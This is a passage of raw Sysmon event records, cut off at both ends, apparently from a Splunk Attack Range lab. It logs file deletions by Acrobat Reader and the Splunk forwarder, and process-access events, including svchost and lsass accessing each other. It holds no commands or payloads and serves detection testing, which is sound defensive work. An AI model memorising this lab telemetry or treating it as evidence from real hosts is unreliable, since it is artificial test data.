DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.027{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B8C87A7EE399C452D622062B38A6AC4,SHA256=19F66F4256E4824F8D6EB8CC32B23E5F02E5A383115C0007793A79E8287445A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.023{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=2A4932E814731A9BDB0CF56E2885EEA7,SHA256=AD137572BB5874F4ACEEBFA922DDAE244B36611BFA3F86565BA2558FC038A30C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:23.012{FE4C2B44-E64B-63C7-8806-00000000AF02}5560ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeC:\Users\Administrator\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journalMD5=36DA557F7375411168B6A44C5C6F3169,SHA256=6F3860E02E6B1FA1C5021E5DE8B66044851CA5F23B054EAF9CE0B053CBEB0A2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:24.545{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A3493B699C772C863C65FD1A431E9D4,SHA256=3E38925B508F7ADB1DC6AABA7CF0D4141D65737AB72B14A9962F59E034C2E278,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018777Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:24.608{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B724A98D6B2E07900B29B583C3E0FA91,SHA256=FA611F0F8812A68BBADB582BE6EA45802BF0E91744309BD83E037606C11CA257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018782Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:25.695{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CA9AF0E0052E4C65CE438037FDC1C76,SHA256=D2B5A05E940F3D2D524006452FA3CA90E1441BBC12E1C07F58335C6F6F8F9E54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018781Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:25.677{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018780Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:25.677{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018779Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:25.677{E5A8D418-DC43-63C7-0B00-00000000B002}6323836C:\Windows\system32\lsass.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+1bfed|C:\Windows\system32\lsasrv.dll+28fbb|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018778Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:25.659{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1C00-00000000B002}2020C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.959{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.907{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.858{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.815{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.721{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.670{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.631{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000047520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.600{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C47BA5F130B91FE19625E40CD510A2,SHA256=46F1706343F8B31B322D1DB139A211F4D766CD9D6816A98608C78AE1131413C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.579{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.515{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.465{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:25.465{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 